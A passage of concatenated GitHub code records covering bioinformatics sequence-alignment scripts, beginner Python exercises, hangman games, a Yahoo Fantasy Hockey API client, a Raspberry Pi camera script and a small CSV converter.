start=0, sample= \"\", nthreads=1, \n workdir=None, outdir=None, timeout=TIMEOUT,ignore_exceptions=False):\n alignments_bam = \"\"\n junctions_tab = \"\"\n junctions_bed = \"\"\n if sr_aligner.upper()==\"HISAT2\":\n try :\n alignments_bam, junctions_tab, junctions_bed=run_hisat2(align_idx=align_idx,\n seq_1=seq_1, seq_2=seq_2, seq_u=seq_u,\n seq_sra=seq_sra, ref_gtf=ref_gtf, \n hisat2_opts=hisat2_opts, hisat2=hisat2, hisat2_sps=hisat2_sps,\n samtools=samtools,\n start=start, sample= sample, nthreads=nthreads,\n workdir=workdir, outdir=outdir, timeout=timeout)\n except Exception as excp:\n logger.info(\"HISAT2 failed!\")\n logger.error(excp)\n if not ignore_exceptions:\n raise Exception(excp)\n \n return alignments_bam, junctions_tab, junctions_bed","repo_name":"bioinform/rnacocktail","sub_path":"src/run_sr_align.py","file_name":"run_sr_align.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"31"} +{"seq_id":"5520294936","text":"#!/usr/bin/env python3\n\nimport math\n\ndef move(x, y, step, angle=0):\n\tnx = x + step * math.cos(angle)\n\tny = y - step * math.sin(angle)\n\treturn nx, ny\n\n\ndef quadratic(a, b, c):\n\td = b * b - 4 * a * c\n\tif d < 0:\n\t\traise TypeError('b*b-4ac<0')\n\tx1 = (-b + math.sqrt(d)) / (2 * a)\n\tx2 = (-b - math.sqrt(d)) / (2 * a)\n\treturn x1, x2\n\n\ndef my_abs(x):\n\tif not isinstance(x, (int, float)):\n\t\traise TypeError('bad operand type')\n\tif x >= 0:\n\t\treturn 10\n\telse:\n\t\treturn -x\n\n\ndef power(x, n=2):\n\ts = 1\n\twhile n > 0:\n\t\tn = n - 1\n\t\ts = s * x\n\treturn s\n\t\n\ndef calc(*numbers):\n\tsum = 0\n\tfor n in numbers:\n\t\tsum = sum + n * n\n\treturn sum\n\ndef product(a, *args):\n\tfor x in args:\n\t\ta = a * x\n\treturn a\n\t\ndef person(name, age, **kw):\n\tprint('name:', name, 'age:', age, 'other:', kw)\n\ndef f1(a, b, c=0, *args, **kw):\n\tprint('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\ndef f2(a, b, c=0, *, d, **kw):\n\tprint('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\ndef trim(s):\n\tb = 0\n\te = len(s)\n\twhile b < e and s[b] == ' ':\n\t\tb = b + 1\n\twhile b < e and s[e-1] == ' ':\n\t\te = e - 1\n\ts = s[b:e]\n\treturn s\n\n\ndef findMinAndMax(L):\n\tif len(L) == 0:\n\t\treturn (None, None)\n\tMin = L[0]\n\tMax = L[0]\n\tfor x in L[1:]:\n\t\tif x < Min:\n\t\t\tMin = x\n\t\tif x > Max:\n\t\t\tMax = x\n\treturn (Min, Max)\n\n\n","repo_name":"Doraemonfan/mytest","sub_path":"python/zlimbo.py","file_name":"zlimbo.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16067607477","text":"import sys\nimport random\nimport globals\n\n# Reads words from the 'words.txt' file and filters them then returns them as a list\ndef getWords(difficulty):\n \n # Initializing a list to store words obtained from the words.txt file\n rawWords = []\n\n # Initializing a list to store the filtered words based on the difficulty level\n filteredWords = []\n\n # Opens the words.txt file in read mode\n with open('../words.txt', 'r') as wfile:\n \n # Iterates through each line and stores each word in the rawWords list\n for line in wfile:\n rawWords = line.lower().split(', ')\n\n # Iterates through each word in the rawWords list and checks if the word falls in the easy or hard word category\n for word in rawWords:\n if (difficulty.lower() == 'easy' and len(word) <= globals.EASY_WORD_MAXLENGTH) or (difficulty.lower() == 'hard' and len(word) <= globals.HARD_WORD_MAXLENGTH and len(word) > globals.EASY_WORD_MAXLENGTH):\n \n # Stores the filtered word in the filteredWords list \n filteredWords.append(word)\n \n return filteredWords\n\n# Generates a random word from the filteredWords list\ndef getRandomWord(difficulty):\n return getWords(difficulty)[random.randint(0, len(getWords(difficulty)) - 1)]\n\n# Replaces each '_' in blanks with the guessed letter\ndef fillBlanks(letter, word, blanks):\n iterable = 0\n\n # Loops through each letter of the word \n while iterable < len(word):\n\n # Checks if the letter is equal to its consequent letter in the word\n if word[iterable] == letter:\n\n # Replaces the '_' in the blanks list with that letter\n blanks[iterable] = letter\n\n # Increments the index iterable\n iterable += 1\n\n # Prints each element of the blanks list separated by a single whitespace for better visualization\n print('\\n' + ' '.join(blanks))\n\n# Displays the starting menu \ndef displayMenu():\n\n print('WELCOME TO HANGMAN IN PYTHON!\\n')\n print(\"Type 'play' to start\")\n print(\"Type 'quit' to exit\\n\")\n\n# Call this in main.py to play the game\ndef play(difficulty):\n\n # This loop stops executing if the user does not wish to play anymore\n while True:\n\n # Starts the game by displaying the menu on the console\n displayMenu()\n\n # Taking user input\n choice = input('Enter your choice: ')\n\n # Dealing with corner cases\n while choice.lower() != 'play' and choice.lower() != 'quit':\n choice = input('Please enter a valid input: ')\n\n # If the user enters 'play' then we enter the logic of the game\n if choice.lower() == 'play':\n\n # Checks if user has entered the difficulty level as a command-line argument\n if len(sys.argv) < 2:\n\n # Prompting the user to enter the difficulty level\n difficulty = input('Please choose the difficulty level (easy/hard): ')\n \n else:\n # Initializing difficulty level as the second command-line argument\n difficulty = sys.argv[1]\n\n # Dealing with corner cases\n while difficulty.isalpha() == False or difficulty.lower() != 'easy' and difficulty.lower() != 'hard':\n difficulty = input('Please enter a valid difficulty level: ')\n\n # Generating the word\n word = getRandomWord(difficulty)\n\n # Storing word length\n word_length = len(word)\n\n # Initializing a character data type that stores the guessed letter\n letter = ''\n\n # Initializing the blanks list with the same number of '_' characters as the length of the word\n blanks = ['_']*word_length\n\n # Initializing misses counter\n misses = 0\n\n # Initializing guesses counter\n guesses = 0\n \n # This list stores each character that the user guesses correctly\n guessed_letters = []\n\n # This iterable is used as an index tracker for the guessed_letters list\n iterable = 0\n\n # For testing purposes\n # Remove the comment below to see the word before guessing\n print('\\nThe word is:', word)\n\n # The loop stops if misses exceed the maximum allowed count or if the user guesses all the letters correctly\n while misses < globals.ALLOWED_MISS_COUNT and guesses != word_length:\n\n # Taking input from the user\n letter = input('\\nPlease enter your guess: ')\n\n # Dealing with corner cases\n while letter.isalpha() == False or letter == '' or len(letter) > 1:\n letter = input('Please enter a valid value: ')\n\n # Printing '_' for each non-guessed letter and replacing each '_' with the right letter after each guess\n fillBlanks(letter=letter, word=word, blanks=blanks)\n\n # Checks if the letter is present in the word\n if letter not in word:\n misses += 1\n print(f'\\nYour guess is wrong!\\nGuesses = {guesses}\\nMisses = {misses}') \n \n # Prints Hangman art\n print(globals.HANGMANPICS[iterable])\n iterable += 1\n\n # Checks if the letter has already been guessed before\n elif letter in word and letter in guessed_letters:\n print(f'\\nYou have already guessed this letter!\\nGuesses = {guesses}\\nMisses = {misses}')\n \n else:\n # This loop checks to see if multiple letters inside the word match our guessed letter and increments the number of guesses accordingly\n for i in word:\n if letter == i:\n guesses += 1\n \n # Adds the guessed letter to our guessed_letters array \n guessed_letters.append(letter) \n \n print(f'\\nYour guess is right!\\nGuesses = {guesses}\\nMisses = {misses}') \n\n # Win/Lose prompts\n if misses == globals.ALLOWED_MISS_COUNT:\n print('\\nYou have lost the game :(. Better luck next time!')\n else:\n print('\\nYou have won the game :). Good Work!')\n\n # Asks the user if they wish to play again\n choice = input('\\nDo you want to play again? (Y/n) ')\n if choice.lower() == 'y':\n print()\n pass\n else:\n break\n\n # If the user enters 'quit' the above loop is skipped\n if choice == 'quit':\n break","repo_name":"abdullahkhalid00/cli-hangman","sub_path":"src/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11098795411","text":"\"\"\"Timer class\"\"\"\nimport threading\nfrom datetime import datetime\n\n\nclass Timer:\n \"\"\"Provide a timer\"\"\"\n def __init__(self):\n self.time_start = None\n self.timeout = None\n self.timer_thread = None\n\n def start(self, timeout, on_timeout_callback):\n \"\"\"start timer with timeout in seconds, on timeout call on_timeout_callback\"\"\"\n self.stop()\n self.time_start = datetime.now().timestamp()\n self.timeout = timeout\n self.timer_thread = threading.Timer(self.timeout, on_timeout_callback)\n self.timer_thread.start()\n\n def stop(self):\n \"\"\"stop timer\"\"\"\n if self.timer_thread is None:\n return\n self.timer_thread.cancel()\n self.time_start = None\n self.timeout = None\n\n def get_remaining_time(self) -> int:\n \"\"\"return the remaining time before timeout\"\"\"\n if self.timeout is None or self.time_start is None:\n return -1\n return int(self.timeout - (datetime.now().timestamp() - self.time_start))\n","repo_name":"kevin-briand/heatger","sub_path":"src/shared/timer/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6369334165","text":"import logging\nimport os\nimport re\nimport sys\n\nimport click\nfrom Bio import SeqIO\nfrom tqdm import tqdm\n\ntqdm.pandas()\nimport pandas as pd\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nsys.path.append(\"..\")\nfrom utils.data_clustering.sequence_clustering_utils import SequenceClusteringUtils\nfrom utils.data_cleaning.sequence_outliers_cleaner import SequenceOutliersCleaner\n\n\ndef clean_sequence_data_from_outliers(record: pd.Series, input_path: str, output_path: str):\n \"\"\"\n :param record: pandas row representative of a cluster of species sequences\n :param input_path: path to the aligned sequences that include outliers\n :param output_path: path to create in aligned sequences without the outliers\n (without re-aligning - just removing outliers and then cleaning the induced alignment from only gap positions)\n :return:\n \"\"\"\n if pd.notna(record.relevant_genome_accessions):\n selected_accessions = record.relevant_genome_accessions.split(\";;\")\n input_sequences = list(SeqIO.parse(input_path, format=\"fasta\"))\n relevant_sequences = [seq for seq in input_sequences if seq.id in selected_accessions]\n # filter out all gap positions with trimal\n SeqIO.write(relevant_sequences, output_path, format=\"fasta\")\n cmd = f\"trimal -in {output_path} -out {output_path} -noallgaps\"\n res = os.system(cmd)\n if res != 0:\n logger.error(f\"trimal execution on {output_path} failed and so only-gap positions are apparent in the data\")\n\n\ndef compute_sequence_similarities_across_species(\n species_info: pd.DataFrame, seq_data_dir: str, output_path: str, use_sequence_directly: bool = True,\n):\n \"\"\"\n :param species_info: data with the names of viruses corresponding to each viral species and the number of available sequences\n :param seq_data_dir: directory holding fasta files of collected sequences per species to compute similarity based on\n :param output_path: path to write the output dataframe to\n :param use_sequence_directly: indicator weather outliers should be removed based on the sequence data directly or based on their pairwise distances\n :return:\n \"\"\"\n relevant_species_info = species_info.loc[\n species_info.virus_species_name.isin(species_info.virus_species_name.unique())\n ]\n if relevant_species_info.shape[0] > 0 and relevant_species_info[\"#sequences\"].values[0] > 0:\n logger.info(f\"computing sequence similarities across {len(species_info.virus_species_name)} species\")\n\n intermediate_output_path = output_path.replace(\".\", \"_intermediate.\")\n if os.path.exists(intermediate_output_path) and relevant_species_info[\"#sequences\"].values[0] > 2:\n relevant_species_info = pd.read_csv(intermediate_output_path)\n else:\n if relevant_species_info.shape[0] > 0:\n logger.info(\n f\"computing sequence similarity value for species {','.join(relevant_species_info.virus_species_name.unique())}\"\n )\n relevant_species_info = compute_entries_sequence_similarities(\n df=relevant_species_info,\n seq_data_dir=seq_data_dir,\n output_path=output_path.replace(\".\", \"_intermediate.\"),\n )\n if (\n \"relevant_genome_accessions\" not in relevant_species_info.columns\n or \"#relevant_sequences\" not in relevant_species_info.columns\n ) or (relevant_species_info.loc[relevant_species_info.relevant_genome_accessions.isna()].shape[0] > 0):\n logger.info(f\"computing outlier sequences for species {relevant_species_info.virus_species_name.unique()}\")\n relevant_species_info = remove_outliers(\n df=relevant_species_info,\n similarities_data_dir=seq_data_dir,\n output_path=output_path.replace(\".\", \"_intermediate.\"),\n use_sequence_directly=use_sequence_directly,\n )\n\n # create new alignments without the outliers\n new_seq_data_dir = f\"{seq_data_dir}/no_outliers/\"\n os.makedirs(new_seq_data_dir, exist_ok=True)\n\n relevant_species_info.loc[relevant_species_info[\"#sequences\"] > 1].apply(\n lambda record: clean_sequence_data_from_outliers(\n record=record,\n input_path=f\"{seq_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', record.virus_species_name)}_aligned.fasta\",\n output_path=f\"{new_seq_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', record.virus_species_name)}_aligned.fasta\",\n ),\n axis=1,\n )\n sequence_similarity_fields = [\n \"#sequences\",\n \"mean_sequence_similarity\",\n \"min_sequence_similarity\",\n \"max_sequence_similarity\",\n \"med_sequence_similarity\",\n \"relevant_genome_accessions\",\n \"#relevant_sequences\",\n ]\n relevant_species_info[\"#relevant_sequences\"] = relevant_species_info[\"relevant_genome_accessions\"].apply(\n lambda x: x.count(\";;\") + 1 if pd.notna(x) else np.nan\n )\n species_info.set_index(\"virus_species_name\", inplace=True)\n for field in sequence_similarity_fields:\n species_info[field] = np.nan\n species_info[field].fillna(\n value=relevant_species_info.set_index(\"virus_species_name\")[field].to_dict(), inplace=True,\n )\n\n species_info.reset_index(inplace=True)\n else:\n species_info[\"#sequences\"] = 0\n species_info[\"#relevant_sequences\"] = 0\n\n species_info.to_csv(output_path, index=False)\n logger.info(f\"wrote associations data clustered by virus species to {output_path}\")\n\n\ndef compute_entries_sequence_similarities(df: pd.DataFrame, seq_data_dir: str, output_path: str,) -> pd.DataFrame:\n \"\"\"\n :param df: dataframe with association entries\n :param seq_data_dir: directory with fasta file corresponding ot each species with its corresponding collected sequences\n :param output_path: path to write the intermediate result to\n :return:\n \"\"\"\n pid = os.getpid()\n tqdm.pandas(desc=\"worker #{}\".format(pid), position=pid)\n\n new_df = df\n new_df[\n [\"mean_sequence_similarity\", \"min_sequence_similarity\", \"max_sequence_similarity\", \"med_sequence_similarity\",]\n ] = np.nan\n if new_df.shape[0] > 0:\n logger.info(\n f\"computing sequence similarities for #species {len(new_df.virus_species_name.values)} that consists of {new_df['#sequences'].values} sequences respectively\"\n )\n\n func = SequenceClusteringUtils.get_sequence_similarity_with_multiple_alignment\n new_df[\n [\n \"mean_sequence_similarity\",\n \"min_sequence_similarity\",\n \"max_sequence_similarity\",\n \"med_sequence_similarity\",\n ]\n ] = new_df.progress_apply(\n lambda x: [1, 1, 1, 1]\n if x[\"#sequences\"] == 1\n else func(sequence_data_path=f\"{seq_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', x.virus_species_name)}.fasta\",),\n axis=1,\n result_type=\"expand\",\n )\n\n new_df.to_csv(output_path, index=False)\n return new_df\n\n\ndef remove_outliers(\n df: pd.DataFrame, similarities_data_dir: str, output_path: str, use_sequence_directly: bool = False,\n) -> pd.DataFrame:\n \"\"\"\n :param df: dataframe with association entries\n :param similarities_data_dir: directory with similarity dataframes corresponding ot each species with its corresponding collected sequences\n :param output_path: path to write the intermediate result to\n :param use_sequence_directly: indicator weather outlier detection should use the sequence data directly or use the pairwise distances between sequences as features\n :return:\n \"\"\"\n pid = os.getpid()\n tqdm.pandas(desc=\"worker #{}\".format(pid), position=pid)\n\n if not os.path.exists(output_path) or (\n os.path.exists(output_path) and \"relevant_genome_accessions\" not in pd.read_csv(output_path).columns\n ):\n new_df = df\n new_df[\"relevant_genome_accessions\"] = np.nan\n if new_df.shape[0] > 0:\n logger.info(\n f\"computing sequence outliers for for species {list(new_df.virus_species_name.unique())[0]} that consists of {','.join(list([str(i) for i in new_df['#sequences'].values]))} sequences respectively\"\n )\n\n func = (\n SequenceOutliersCleaner.get_relevant_accessions_using_sequence_data_directly\n if use_sequence_directly\n else SequenceOutliersCleaner.get_relevant_accessions_using_pairwise_distances\n )\n input_path_suffix = \"_aligned.fasta\" if use_sequence_directly else \"_similarity_values.csv\"\n new_df.loc[new_df[\"#sequences\"] > 1, \"relevant_genome_accessions\"] = new_df.loc[\n new_df[\"#sequences\"] > 1, \"virus_species_name\"\n ].progress_apply(\n lambda x: func(\n data_path=f\"{similarities_data_dir}/{re.sub('[^0-9a-zA-Z]+', '_', x)}{input_path_suffix}\"\n )\n )\n new_df[\"#relevant_sequences\"] = new_df[\"relevant_genome_accessions\"].apply(\n lambda x: x.count(\";;\") + 1 if pd.notna(x) else np.nan\n )\n\n new_df.to_csv(output_path, index=False)\n else:\n new_df = pd.read_csv(output_path)\n return new_df\n\n\n@click.command()\n@click.option(\n \"--species_info_path\",\n type=click.Path(exists=True, file_okay=True, readable=True),\n help=\"path to dataframe holding the names of taxa under each viral species\",\n)\n@click.option(\n \"--sequence_data_dir\",\n type=click.Path(exists=False, file_okay=True, readable=True),\n help=\"directory holding sequence data files per species with their collected sequences\",\n)\n@click.option(\n \"--log_path\",\n type=click.Path(exists=False, file_okay=True, readable=True),\n help=\"path holding the logging of the script\",\n)\n@click.option(\n \"--df_output_path\",\n type=click.Path(exists=False, file_okay=True, readable=True),\n help=\"path holding the output dataframe to write\",\n)\n@click.option(\n \"--use_sequence_directly\",\n type=click.BOOL,\n help=\"indicator weather outliers should be removed based on sequence data directly or based on pairwise distances\",\n required=False,\n default=False,\n)\ndef compute_seq_similarities(\n species_info_path: click.Path,\n sequence_data_dir: click.Path,\n log_path: click.Path,\n df_output_path: click.Path,\n use_sequence_directly: bool,\n):\n # initialize the logger\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s module: %(module)s function: %(funcName)s line: %(lineno)d %(message)s\",\n handlers=[logging.StreamHandler(sys.stdout), logging.FileHandler(str(log_path)),],\n force=True, # run over root logger settings to enable simultaneous writing to both stdout and file handler\n )\n\n # process input data\n species_info = pd.read_csv(species_info_path)\n\n # compute sequence similarities\n compute_sequence_similarities_across_species(\n species_info=species_info,\n seq_data_dir=str(sequence_data_dir),\n output_path=str(df_output_path),\n use_sequence_directly=use_sequence_directly,\n )\n\n\nif __name__ == \"__main__\":\n compute_seq_similarities()\n","repo_name":"halabikeren/vir_to_host","sub_path":"virus/compute_sequence_similarity_across_species.py","file_name":"compute_sequence_similarity_across_species.py","file_ext":"py","file_size_in_byte":11399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22103900144","text":"import xml.etree.ElementTree as et\nfrom yahoo.yahoo_api import YahooApi \nfrom utilities import utilities\n\ndef FantasyHockeyApi(format, credentials, league_id):\n if format.lower() == 'json':\n return JsonFantasyHockeyApi(credentials, league_id)\n elif format.lower() == 'xml':\n return XmlFantasyHockeyApi(credentials, league_id)\n else:\n raise NotImplementedError()\n\nclass JsonFantasyHockeyApi(YahooApi):\n def __init__(self, credentials, league_id, game_id=None):\n super().__init__(credentials)\n self.base_url = \"https://fantasysports.yahooapis.com/fantasy/v2/\"\n self.game = game_id or self.get_game()\n self.league = league_id\n\n def get_team(self, team_id, format='json'):\n response = self.get(self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/\", format=format)\n try:\n raw_team_data = self.__flatten_list_of_dicts(response['fantasy_content']['team'][0])\n except KeyError as err:\n if \"fantasy_content\" in err.args:\n # The request was successful, but there was no matching team ID\n return None\n return raw_team_data\n\n def get_team_matchups(self, team_id, format='json'):\n \"\"\"For a given team, fetch matchup data for all weeks of the season, including stat results\"\"\"\n response = self.get(self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/matchups/\", format='json')\n raw_matchup_data = response['fantasy_content']['team'][1]['matchups']\n\n matchups = []\n for key in raw_matchup_data.keys():\n if utilities.safe_cast(key, int):\n # Save matchup info dictionary\n matchup_info = raw_matchup_data[key]['matchup']\n\n # The stat info is nested, so the following is to un-nest it and put it directly in this dictionary\n matchup_team_dictionary = raw_matchup_data[key]['matchup']['0']['teams']\n for mk in matchup_team_dictionary.keys():\n if utilities.safe_cast(mk, int) != None:\n team_info = self.__flatten_list_of_dicts(matchup_team_dictionary[mk]['team'][0])\n # Check if we have the target team_id, and if so, gather the stats\n if (utilities.safe_cast(mk, int) != None) and (team_info['team_id'] == team_id):\n # Set the 'stats' part of the matchup info and jump out\n matchup_info['stats'] = matchup_team_dictionary[mk]['team'][1]['team_stats']['stats']\n break\n\n if 'stats' not in matchup_info.keys():\n raise Exception(\"Could not find stats info for \" + str(team_id))\n\n # Remove un-needed info from dictionary before moving on\n matchup_info.pop(\"0\")\n \n matchups.append(matchup_info)\n\n return matchups\n\n def get_all_teams(self, format='json'):\n \"\"\"Gets a list of teams participating in the fantasy league along with their basic team info\"\"\"\n response = self.get(self.base_url + \"/league/\" + str(self.game) + \".l.\" + str(self.league) + \"/teams/\", format=format)\n raw_team_list = response['fantasy_content']['league'][1]['teams']\n \n # Flatten the team info, because Yahoo's JSON is very packed with garbage info\n team_list = []\n for key in raw_team_list.keys():\n # Remove non-team dict entries from processing\n if (utilities.safe_cast(key, int)):\n team_info = self.__flatten_list_of_dicts(raw_team_list[key]['team'][0])\n # Add team info dict to the overall list of teams\n team_list.append(team_info)\n \n return team_list\n\n def get_team_roster(self, team_id, format='json'):\n return self.get(self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/roster/\", format=format)\n\n def get_game(self, format='json'):\n \"\"\"Fetches the game ID for the current NHL season in Yahoo\"\"\"\n response = self.get(self.base_url + \"game/nhl\", format=format)\n return response['fantasy_content']['game'][0]['game_id']\n\n def get_league(self, format='json'):\n return self.get(self.base_url + \"league/\" + str(self.game) + \".l.\" + str(self.league) + \"/\", format=format)\n\n def get_all_players(self, format='json'):\n return self.get(self.base_url + \"league/\" + str(self.game) + \".l.\" + str(self.league) + \"/players/\", format=format)\n\n def __flatten_list_of_dicts(self, list_of_dictionaries):\n \"\"\"Flatten the list of property dictionaries into one dictionary. This ignores non-dictionaries in the list\"\"\"\n result_dict = {}\n for single_dictionary in list_of_dictionaries:\n if type(single_dictionary) == dict:\n result_dict.update(single_dictionary)\n\n return result_dict \n\n\nclass XmlFantasyHockeyApi(YahooApi):\n \n def __init__(self, credentials, league_id, game_id=None):\n super().__init__(credentials)\n self.base_url = \"https://fantasysports.yahooapis.com/fantasy/v2/\"\n self._ns = {\"yahoo\": \"http://fantasysports.yahooapis.com/fantasy/v2/base.rng\"}\n self.game = game_id or self.get_game()\n self.league = league_id\n\n def get_game(self):\n \"\"\"Gets the game ID for the current NHL season in Yahoo\"\"\"\n # Send the request\n url = self.base_url + \"game/nhl\"\n response = self.get(url, format='xml')\n\n # Convert XML text into object and get game ID\n game_id = et.fromstring(response)\\\n .find('yahoo:game', self._ns)\\\n .find('yahoo:game_id', self._ns)\\\n .text\n\n return int(game_id)\n\n def get_team(self, team_id):\n \"\"\"Gets the team info given a team's Yahoo specific team ID\"\"\"\n # Send request\n url = self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/\"\n response = self.get(url, format='xml')\n \n # Convert XML text into object and return the outer team tag\n return et.fromstring(response)\\\n .find('yahoo:team', self._ns)\n\n def get_team_with_matchups(self, team_id):\n \"\"\"For a given team, fetch all data, including matchups and stats\"\"\"\n # Send request\n url = self.base_url + \"team/\" + str(self.game) + \".l.\" + str(self.league) + \".t.\" + str(team_id) + \"/matchups/\"\n response = self.get(url, format='xml')\n\n return et.fromstring(response)\\\n .find('yahoo:team', self._ns)\n\n def get_matchups(self, team_id):\n \"\"\"For a given team, fetch matchup data for all weeks of the season, including stat results\"\"\"\n return self.get_team_with_matchups(team_id)\\\n .find('yahoo:matchups', self._ns)\n\n def get_all_teams(self):\n \"\"\"Gets a list of teams participating in the fantasy league along with their basic team info\"\"\"\n # Send request\n url = self.base_url + \"/league/\" + str(self.game) + \".l.\" + str(self.league) + \"/teams/\"\n response = self.get(url, format='xml')\n\n return et.fromstring(response)\\\n .find('yahoo:league', self._ns)\\\n .find('yahoo:teams', self._ns)\n","repo_name":"kmobile33/yahoo-fantasy-nhl","sub_path":"yahoo/fantasy_hockey_api.py","file_name":"fantasy_hockey_api.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42256586591","text":"#!/usr/bin/python3\n\nimport io\nfrom picamera import PiCamera\nfrom time import sleep\nfrom PIL import Image, ImageDraw, ImageFont\nfrom datetime import datetime\nimport sys\nfrom pathlib import Path\n\nimport Configuration as cfg\nresX = cfg.camera[\"resX\"]\nresY = cfg.camera[\"resY\"]\n\nPath( cfg.camera[\"path\"] ).mkdir(parents=True, exist_ok=True)\nimageName = cfg.camera[\"path\"] + \"/\" + datetime.today().strftime(\"IMG_%y%m%d_%H%M%S.jpg\")\n\n\nstream = io.BytesIO()\nwith PiCamera() as camera:\n\tcamera.resolution = (resX, resY)\n\tcamera.start_preview()\n\tsleep( int(cfg.camera[\"secondsToFocus\"]) )\n\tcamera.capture(stream, format='jpeg')\n\n# \"Rewind\" the stream to the beginning so we can read its content\nstream.seek(0)\nimage = Image.open(stream)\n\nfontsize = int(resX/15) # starting font size\nfont = ImageFont.truetype(\"arialr.ttf\", fontsize)\ndraw = ImageDraw.Draw(image)\n\n# time\ndraw.text((int(resX/4*3), int(resY/13*2)), datetime.today().strftime('%H:%M'), font=font, fill='white', stroke_width=2)\n# time elapsed\nif( len(sys.argv) >= 1 ):\n\tdraw.text((int(resX/4*3), int(resY/13*4)), sys.argv[1], font=font, fill='white', stroke_width=2)\n# temperature\nif( len(sys.argv) >= 2 ):\n\tdraw.text((int(resX/4*3), int(resY/13*8)), sys.argv[2], font=font, fill='yellow', stroke_width=2)\n\nimage.show()\nimage.save(imageName)\n\nprint(imageName)\n","repo_name":"jbeyoglo/Proofer","sub_path":"TakePhoto.py","file_name":"TakePhoto.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26142117469","text":"import pandas as pd\nimport datetime, time\n#\n# activity = pd.read_csv('./datas/novin.csv', sep = ',')\n\ndef convertTime(t):\n x = time.strptime(t,'%H:%M')\n return str(int(datetime.timedelta(hours=x.tm_hour,minutes=x.tm_min,seconds=x.tm_sec).total_seconds()))\n\nactivity = pd.read_csv('./datas/novin.csv', sep=',',converters={'activity_end(s)': convertTime,\n 'activity_begin(s)': convertTime})\n\n#activity = pd.read_csv('./datas/novin.csv', sep=',')\n\nactivity['activity_length(s)'] = activity['activity_end(s)'].subtract(activity['activity_begin(s)'])\nactivity['walk_duration(s)'] = activity['activity_length(s)'].subtract(activity['pause(s)'])\nactivity['tiredness(s)'] = activity['pause(s)'].divide(activity['walk_duration(s)'])\nactivity['speed(s)'] = activity['step_count'].divide(activity['walk_duration(s)'])\n\nactivity.to_csv('./datas/novins_final', index= False)\n\nprint(activity.head())","repo_name":"surajrasaq/suraj","sub_path":"csv_converter.py","file_name":"csv_converter.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35305804051","text":"import pygame,sys\r\nimport time\r\nimport string\r\nimport random\r\nfrom PIL import Image\r\npygame.init()\r\ndisplay=pygame.display.set_mode((1540,800))\r\nblack = pygame.Color(0, 0, 0)\r\nwhite = pygame.Color(255, 255, 255)\r\nred = pygame.Color(255, 0, 0)\r\ngreen = pygame.Color(0, 255, 0)\r\nblue = pygame.Color(0, 0, 255)\r\npygame.display.set_caption('My First Game-By Vishnu Mali')\r\nclock = pygame.time.Clock() \r\nfont=pygame.font.SysFont(\"Serif\",22)\r\nfont2=pygame.font.SysFont(\"Serif\",28)\r\n#----------------------------------------------------------------------------------------\r\nIMAGES = [r\"step0.jpg\",r\"step1.jpg\",r\"step2.jpg\",r\"step3.jpg\",r\"step4.jpg\",r\"step5.jpg\",r\"step6.jpg\",r\"death.jpg\"]\r\ndef load_words(): \r\n F = open(\"easywords.txt\", 'r')\r\n line = F.readline()\r\n word_list = line.split(\" \")\r\n return word_list\r\ndef choose_word():\r\n word_list = load_words()\r\n secret_word = random.choice(word_list)\r\n secret_word = secret_word.lower()\r\n return secret_word\r\ndef is_word_guessed(secret_word, letters_guessed,sourav):\r\n if len(secret_word)==sourav:\r\n return True\r\n return False\r\ndef get_guessed_word(secret_word, letters_guessed):\r\n index = 0\r\n guessed_word = \"\"\r\n while (index < len(secret_word)):\r\n if secret_word[index] in letters_guessed:\r\n guessed_word += secret_word[index]\r\n else:\r\n guessed_word += \"_\"\r\n index += 1\r\n return guessed_word\r\ndef get_available_letters(letters_guessed):\r\n letters_left = list(string.ascii_lowercase)\r\n for el in letters_guessed:\r\n letters_left.remove(el)\r\n return letters_left\r\ndef hangman(secret_word):\r\n display.blit(font.render(\"Starting The Game.Please wait...\", True, blue), (250,670))\r\n display.blit(pygame.image.load(\"logo.png\"),(250,0))\r\n pygame.display.update()\r\n pygame.time.wait(2*1000)\r\n newgame=True\r\n rect1=pygame.Rect(150, 150, 70, 50)\r\n won=0\r\n lose=0\r\n while newgame:\r\n secret_word = choose_word()\r\n display.fill(white)\r\n color=white\r\n display.blit(font.render(\"WON: \"+ str(won) +\" LOSE: \"+str(lose), True, blue), (1100,100))\r\n msg2=\"Welcome to the game, Hangman!.I am thinking of a word that is \"+str(len(secret_word))+ \" letters long.\"\r\n display.blit(font.render(msg2, True, blue), (80,100))\r\n pygame.display.update()\r\n pygame.time.wait(1*1000)\r\n letters_guessed = []\r\n imagecount=0\r\n sourav=0\r\n gamefinish=False\r\n while imagecount<=len(IMAGES) and not gamefinish: \r\n available_letters = get_available_letters(letters_guessed)\r\n display.blit(font.render(\"Available letters are ==\"+str(available_letters), True, blue), (50,150))\r\n pygame.display.update()\r\n 